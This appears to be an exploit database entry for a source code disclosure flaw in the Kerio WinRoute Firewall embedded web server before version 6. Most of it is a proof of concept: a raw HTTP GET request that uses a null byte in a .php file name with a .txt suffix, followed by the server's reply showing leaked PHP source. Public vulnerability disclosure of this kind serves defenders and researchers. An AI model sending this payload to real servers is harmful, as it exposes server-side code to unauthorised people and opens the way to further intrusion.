Kerio WinRoute Firewall Web Server < 6 Source Code Disclosure

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Kerio WinRoute Firewall Web Server < 6 Source Code Disclosure, Allows Obtaining Server-Side Application Source Cod


                                                # Exploit Title: Kerio WinRoute Firewall Embedded Web ServerVersion: Source
Code Disclosure
# Google Dork:
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://winroute.ru/kerio_winroute_firewall.htm
# Version: prior to 6
# Tested on: Microsoft Windows
# CVE :

Source code disclosure attacks on Kerio Web Server allow a malicious user
to obtain the source code of a server-side application.
This vulnerability grants the attacker deeper knowledge of the Web
application logic.

POC:
GET /nonauth/login.phpNULL_BYTE.txt HTTP/1.1
User-Agent: Group-IB OAiK Fuzzer
Host: hostname

HTTP/1.1 200 OK
Connection: Close
Content-Length: 2410
Content-Type: text/plain
Date: Fri, 27 Apr 2012 13:42:27 GMT
Last-Modified: Wed, 15 Oct 2008 03:14:06 GMT
Server: Kerio WinRoute Firewall Embedded Web Server

&#60;?php
require_once(&#39;configNonauth.inc&#39;);
require_once(CORE_PATH . &#39;langHeader.inc&#39;);
require_once(LIB_PATH . &#39;Page.inc&#39;);
require_once(LIB_PATH . &#39;HtmlElements.inc&#39;);
require_once(CORE_PATH . &#39;common.inc&#39;);
require_once(CORE_PATH . &#39;browser.inc&#39;);
$afg = &#39;&#39;;
$jy = kerio(&#34;webiface::PhpNonAuth&#34;);
$jy-&#62;getAsocUserName(&$afg, &$aba);
.....

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1